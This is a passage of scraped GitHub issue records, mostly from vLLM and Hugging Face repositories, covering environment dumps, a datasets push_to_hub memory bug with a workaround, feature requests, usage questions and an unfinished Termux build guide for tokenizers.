8\nFrequency boost: enabled\nCPU max MHz: 2001.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr avx512_fp16 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu", "url": "https://github.com/vllm-project/vllm/issues/29944", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-03T07:03:49Z", "updated_at": "2025-12-03T07:04:37Z", "comments": 0, "user": "wenba0" }, { "repo": "vllm-project/vllm", "number": 29940, "title": "[Usage]: QWen2-Audio-7B support", "body": "### Your current environment\n\nWe encountered numerous peculiar issues during the QWen2-Audio-7B conversion process. Do we currently support Qwen2-Audio-7B? 
If so, could you provide a demo?\n\nThank you very much\uff01\n\n### \ud83d\udc1b Describe the bug\n\nRefer to Whisper's demo\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29940", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-03T06:04:07Z", "updated_at": "2025-12-04T14:23:05Z", "comments": 1, "user": "freedom-cui" }, { "repo": "huggingface/datasets", "number": 7893, "title": "push_to_hub OOM: _push_parquet_shards_to_hub accumulates all shard bytes in memory", "body": "## Summary\n\nLarge dataset uploads crash or hang due to memory exhaustion. This appears to be the root cause of several long-standing issues.\n\n### Related Issues\n\nThis is the root cause of:\n- #5990 - Pushing a large dataset on the hub consistently hangs (46 comments, open since 2023)\n- #7400 - 504 Gateway Timeout when uploading large dataset\n- #6686 - Question: Is there any way for uploading a large image dataset?\n\n### Context\n\nDiscovered while uploading the [Aphasia Recovery Cohort (ARC)](https://openneuro.org/datasets/ds004884) neuroimaging dataset (~270GB, 902 sessions) to HuggingFace Hub using the `Nifti()` feature.\n\nWorking implementation with workaround: [arc-aphasia-bids](https://github.com/The-Obstacle-Is-The-Way/arc-aphasia-bids)\n\n## Root Cause\n\nIn `_push_parquet_shards_to_hub` (arrow_dataset.py), the `additions` list accumulates every `CommitOperationAdd` with full Parquet bytes in memory:\n\n```python\nadditions = []\nfor shard in shards:\n parquet_content = shard.to_parquet_bytes() # ~300 MB per shard\n shard_addition = CommitOperationAdd(path_or_fileobj=parquet_content)\n api.preupload_lfs_files(additions=[shard_addition])\n additions.append(shard_addition) # THE BUG: bytes stay in memory forever\n```\n\nFor a 902-shard dataset: **902 \u00d7 300 MB = ~270 GB RAM requested \u2192 OOM/hang**.\n\nThe bytes are held until the final `create_commit()` call, preventing garbage collection.\n\n## Reproduction\n\n```python\nfrom datasets import load_dataset\n\n# Any large dataset with embedded files (Image, Audio, Nifti, etc.)\nds = load_dataset(\"imagefolder\", data_dir=\"path/to/large/dataset\")\nds.push_to_hub(\"repo-id\", num_shards=500) # Watch memory grow until crash\n```\n\n## Workaround\n\nProcess one shard at a time, upload via `HfApi.upload_file(path=...)`, delete before next iteration:\n\n```python\nfrom huggingface_hub import HfApi\nimport pyarrow.parquet as pq\n\napi = HfApi()\nfor i in range(num_shards):\n shard = ds.shard(num_shards=num_shards, index=i, contiguous=True)\n \n # Write to disk, not memory\n shard.to_parquet(local_path)\n \n # Upload from file path (streams from disk)\n api.upload_file(\n path_or_fileobj=str(local_path),\n path_in_repo=f\"data/train-{i:05d}-of-{num_shards:05d}.parquet\",\n repo_id=repo_id,\n repo_type=\"dataset\",\n )\n \n # Clean up before next iteration\n local_path.unlink()\n del shard\n```\n\nMemory usage stays constant (~1-2 GB) instead of growing linearly.\n\n## Suggested Fix\n\nAfter `preupload_lfs_files` succeeds for each shard, release the bytes:\n\n1. Clear `path_or_fileobj` from the `CommitOperationAdd` after preupload\n2. Or write to temp file and pass file path instead of bytes\n3. 
Or commit incrementally instead of batching all additions\n\n## Environment\n\n- datasets version: main branch (post-0.22.0)\n- Platform: macOS 14.x ARM64\n- Python: 3.13\n- PyArrow: 18.1.0\n- Dataset: 902 shards, ~270 GB total embedded NIfTI files", "url": "https://github.com/huggingface/datasets/issues/7893", "state": "closed", "labels": [], "created_at": "2025-12-03T04:19:34Z", "updated_at": "2025-12-05T22:45:59Z", "comments": 2, "user": "The-Obstacle-Is-The-Way" }, { "repo": "vllm-project/vllm", "number": 29920, "title": "[Feature]: Add support for fused fp8 output to FlashAttention 3", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nOn Hopper, we use FlashAttention as the default attention backend. When o-proj is quantized to fp8, we are leaving performance on the table, as FA3 does not support fused output fp8 quant. With the Triton/ROCm/AITER backends we saw up to 8% speedups with attention+quant fusion.\n\nvLLM already maintains our own fork of FA, so adding output quant support should be pretty non-intrusive. Subtasks:\n- vllm-flash-attn:\n - add `output_scale` parameter to attention forward functions\n - plumb parameter through all layers of the interface\n - compare branching at runtime/compile-time for performance and binary size (Hopper)\n\n- vllm:\n - integrate new FA version\n - add support for attention+quant fusion to the FA attention backend\n - check FA version, hardware version\n - should be as easy as modifying the `supports_fused_output_quant` method and plumbing `output_scale` from `FlashAttentionImpl.forward()` to the kernel call\n\n### Additional context\n\ncc @LucasWilkinson \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29920", "state": "open", "labels": [ "help wanted", "performance", "feature request", "torch.compile" ], "created_at": "2025-12-02T20:16:31Z", "updated_at": "2026-01-05T20:53:11Z", "comments": 4, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 29917, "title": "[Feature]: VLLM_DISABLE_COMPILE_CACHE should be a config flag", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n`vllm serve` does a nice printout of non-default config flags. `VLLM_DISABLE_COMPILE_CACHE` gets used often enough that it should have an equivalent config flag.\n\nOffline, @ProExpertProg mentioned we can treat it like `VLLM_DEBUG_DUMP_PATH`, where both exist and the env var overrides the config option by overwriting it directly.\n\n### Alternatives\n\nnone\n\n### Additional context\n\nn/a\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29917", "state": "open", "labels": [ "help wanted", "feature request", "torch.compile" ], "created_at": "2025-12-02T20:06:01Z", "updated_at": "2025-12-05T05:19:12Z", "comments": 6, "user": "zou3519" }, { "repo": "huggingface/inference-playground", "number": 102, "title": "How to know when a model is outdated?", "body": "I'm testing https://huggingface.co/chat/models/openai/gpt-oss-20b and there I asked this:\n```\ndo you know any github repository created in 2025?\n\n

Sure! Here are a few GitHub repositories that were created in 2025 (all with their public \u201ccreated date\u201d and a short description):

\n\nRepository | Created | Short description | Link\n\nopen-thoughts/open-thoughts | 2025-01-27 | An open-source platform for curating datasets that can be used to train and evaluate reasoning-oriented language models. | https://github.com/open-thoughts/open-thoughts\n...\n```\nBut on https://huggingface.co/playground:\n```\ndo you know any github repository created in 2025?\n\nI don\u2019t have any information about repositories that were created in 2025. My training data only goes up to September 2023, so I can\u2019t see or reference anything that was added to GitHub after that date. If you\u2019re looking for recent projects, you could search GitHub directly or use the GitHub API to filter repositories by creation date.\n```\nI'm asking it here because I don't know where else to ask; I also opened an issue here: https://github.com/ggml-org/llama.cpp/discussions/15396#discussioncomment-15136920 .\n\nI've also downloaded https://huggingface.co/openai/gpt-oss-20b, and running it locally it doesn't know anything from 2025.\n\n**Based on this I suspect that the model running here https://huggingface.co/chat/models/openai/gpt-oss-20b is not the one that's here https://huggingface.co/openai/gpt-oss-20b .**\n\n**How/Where can we get the version running here https://huggingface.co/chat/models/openai/gpt-oss-20b ?**", "url": "https://github.com/huggingface/inference-playground/issues/102", "state": "open", "labels": [], "created_at": "2025-12-02T17:10:51Z", "updated_at": "2025-12-02T17:10:51Z", "user": "mingodad" }, { "repo": "vllm-project/vllm", "number": 29875, "title": "[Usage]: Is there a way to inject the grammar into the docker directly", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.28.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 | packaged by conda-forge | (main, Oct 22 2025, 22:29:10) [GCC 14.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-1030-azure-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 535.247.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 
40\nOn-line CPU(s) list: 0-39\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9V84 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 40\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4800.05\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves user_shstk avx512_bf16 clzero xsaveerptr rdpru arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid fsrm\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 1.3 MiB (40 instances)\nL1i cache: 1.3 MiB (40 instances)\nL2 cache: 40 MiB (40 instances)\nL3 cache: 160 MiB (5 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; STIBP disabled; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n", "url": "https://github.com/vllm-project/vllm/issues/29875", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T12:30:56Z", "updated_at": "2025-12-03T11:53:43Z", "comments": 1, "user": "chwundermsft" }, { "repo": "vllm-project/vllm", "number": 29871, "title": "[Usage]: Extremely low token input speed for DeepSeek-R1-Distill-Llama-70B", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (GCC) 14.2.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.4 (main, Aug 29 2025, 09:21:27) [GCC 14.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-118-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA H100 80GB HBM3\nGPU 1: NVIDIA H100 80GB HBM3\nGPU 2: NVIDIA H100 80GB HBM3\nGPU 3: NVIDIA H100 80GB HBM3\nGPU 4: NVIDIA H100 80GB HBM3\nGPU 5: NVIDIA H100 80GB HBM3\nGPU 6: NVIDIA H100 80GB HBM3\nGPU 7: NVIDIA H100 80GB HBM3\n\nNvidia driver version : 570.158.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9654 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 96\nSocket(s): 2\nStepping: 1\nFrequency boost: enabled\nCPU max MHz: 3707.8120\nCPU min MHz: 1500.0000\nBogoMIPS: 4793.01\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 invpcid_single hw_pstate ssbd mba ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin cppc arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid overflow_recov succor smca fsrm flush_l1d\nVirtualization: AMD-V\nL1d cache: 6 MiB (192 instances)\nL1i cache: 6 MiB (192 instances)\nL2 cache: 192 MiB (192 instances)\nL3 cache: 768 MiB (24 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-95\nNUMA node1 CPU(s): 96-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data 
sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; STIBP disabled; RSB filling; PBRSB-eIB", "url": "https://github.com/vllm-project/vllm/issues/29871", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T11:25:25Z", "updated_at": "2025-12-02T15:30:53Z", "comments": 2, "user": "muelphil" }, { "repo": "vllm-project/vllm", "number": 29866, "title": "[Doc]:", "body": "### \ud83d\udcda The doc issue\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n\n### Suggest a potential alternative/fix\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29866", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-02T10:43:04Z", "updated_at": "2025-12-02T10:50:10Z", "comments": 0, "user": "hassaballahmahamatahmat5-cpu" }, { "repo": "vllm-project/vllm", "number": 29865, "title": "[Doc]:", "body": "### \ud83d\udcda The doc issue\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n\n### Suggest a potential alternative/fix\n\n# Installation des biblioth\u00e8ques XAI\n!pip install shap\n!pip install lime\n!pip install alibi\n!pip install interpret\n!pip install dalex\n!pip install eli5\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29865", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-02T10:43:01Z", "updated_at": "2025-12-02T10:50:00Z", "comments": 0, "user": "hassaballahmahamatahmat5-cpu" }, { "repo": "vllm-project/vllm", "number": 29864, "title": "[Usage]: I am unable to run the GLM-4.5-Air-REAP-82B-A12B-nvfp4 model on an RTX 5090.", "body": "### Your current environment\n\n\n I am unable to run the GLM-4.5-Air-REAP-82B-A12B-nvfp4 model on an RTX 5090.\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 12.3.0-1ubuntu1~22.04.2) 12.3.0\nClang version : Could not collect\nCMake version : version 4.2.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.10.0.dev20251124+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version 
: 3.10.12 (main, Nov 4 2025, 08:48:33) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 5090\nGPU 1: NVIDIA GeForce RTX 5090\nGPU 2: NVIDIA GeForce RTX 5090\nGPU 3: NVIDIA GeForce RTX 5090\n\nNvidia driver version : 570.172.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 112\nOn-line CPU(s) list: 0-111\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6330 CPU @ 2.00GHz\nCPU family: 6\nModel: 106\nThread(s) per core: 2\nCore(s) per socket: 28\nSocket(s): 2\nStepping: 6\nCPU max MHz: 3100.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 intel_ppin ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid fsrm md_clear pconfig flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 2.6 MiB (56 instances)\nL1i cache: 1.8 MiB (56 instances)\nL2 cache: 70 MiB (56 instances)\nL3 cache: 84 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-27,56-83\nNUMA node1 CPU(s): 28-55,84-111\nVulnerability Gather data sampling: Mitigation; Microcode\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT vulnerable\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI SW loop, KVM SW loop\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vmscape: Not affected\n", "url": "https://github.com/vllm-project/vllm/issues/29864", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-02T10:13:31Z", "updated_at": "2025-12-05T17:06:30Z", "comments": 2, "user": "east612-ai" }, { "repo": 
"huggingface/diffusers", "number": 12772, "title": "How to convert diffusers model to wan2.2 format", "body": "I see convert_wan_to_diffusers.py in diffusers repo, but no convert_diffusers_to_wan.py. Do you have plan to upload a convert scripts?\n", "url": "https://github.com/huggingface/diffusers/issues/12772", "state": "open", "labels": [], "created_at": "2025-12-02T09:19:29Z", "updated_at": "2025-12-02T09:19:29Z", "user": "wikiwen" }, { "repo": "huggingface/diffusers", "number": 12764, "title": "When will the img2img pipeline of FLUX.2-dev be released?", "body": "I see that the current version(0.36.0-dev) only updated the text-to-image pipeline for Flux2. We are looking forward to the update of the image-to-image pipeline!\n", "url": "https://github.com/huggingface/diffusers/issues/12764", "state": "open", "labels": [], "created_at": "2025-12-01T11:25:35Z", "updated_at": "2025-12-01T11:41:56Z", "comments": 1, "user": "guanxyu" }, { "repo": "huggingface/smolagents", "number": 1890, "title": "Question: how to use sever-side tools provided by Google Gemini or OpenAI GPT?", "body": "Gemini has some server-side tools like google_search (https://ai.google.dev/gemini-api/docs/google-search) or google_map. OpenAI also has server-side tools like web_search. Does Smolagents support using such server-side tools from agents? If so, how?", "url": "https://github.com/huggingface/smolagents/issues/1890", "state": "open", "labels": [], "created_at": "2025-12-01T05:16:01Z", "updated_at": "2025-12-23T10:49:45Z", "user": "victorx-deckard" }, { "repo": "huggingface/agents-course", "number": 623, "title": "Message: Submission received, but no valid/matching task IDs were found in the 1 answers provided. Score did not improve previous record, leaderboard not updated.", "body": "I am correctly downloading the GAIA 2023 Level 1 validation dataset using snapshot_download and load_dataset. This submission is for Unit 4 Agent Course. \n\n data_dir = snapshot_download(\n repo_id=\"gaia-benchmark/GAIA\",\n repo_type=\"dataset\"\n )\n \n dataset = load_dataset(data_dir, \"2023_level1\", split=\"validation\")\n subset = dataset.select(range(20))\n for item in subset:\n task_id = item.get(\"task_id\")\n question_text = item.get(\"Question\")\n file_name = item.get(\"file_name\")\n\nI experience failures when trying to run the first 20 questions i received only 5 task ids are valid.. When I specifically tried to isolate and run the task ID '935e2cff-ae78-4218-b3f5-115589b19dae' using the filtering method, the evaluation system reported. \n\n\"Image\"\n\n 'Submission received, but no valid/matching task IDs were found in the 1 answers provided.' This occurred even though I was confident the answer was correct", "url": "https://github.com/huggingface/agents-course/issues/623", "state": "open", "labels": [ "question" ], "created_at": "2025-12-01T02:09:21Z", "updated_at": "2025-12-01T02:09:21Z", "user": "ShwetaBorole" }, { "repo": "huggingface/tokenizers", "number": 1902, "title": "Guide: Compiling `tokenizers` on Android/Termux", "body": "Hello Hugging Face team and fellow developers,\n\nThis is a guide for anyone trying to install `tokenizers` (or packages that depend on it, like `transformers` or `docling`) on an Android device using [Termux](https://termux.dev/). 
Currently, there are no other issues mentioning Termux, so hopefully, this guide can help others.\n\n### The Problem\n\nWhen running `pip install tokenizers` in a standard Termux environment, the installation fails during the compilation of a C++ dependency with an error similar to this:\n```\nerror: use of undeclared identifier 'pthread_cond_clockwait'\n```\nThis happens because the build system is targeting an Android API level where this function is not available in the C library headers.\n\n### The Solution\n\nThe solution is to force the compilation from source and pass specific flags to the C++ compiler to set the correct Android API level and link the required libraries.\n\nHere is a step-by-step guide:\n\n#### Step 1: Install Build Dependencies\n\nYou will need the Rust toolchain and other build essentials. You can install them in Termux using `pkg`:\n```bash\npkg update && pkg install rust clang make maturin\n```\n\n#### Step 2: Find Your Android API Level\n\nThe fix requires telling the compiler which Android API level you are using. You can get this number by running the following command in your Termux shell:\n```bash\ngetprop ro.build.version.sdk\n```\nThis will return a number, for example `29`, `30`, `33`, etc. This function (`pthread_cond_clockwait`) was introduced in API level 21, so your device's level should be higher than that.\n\n#### Step 3: 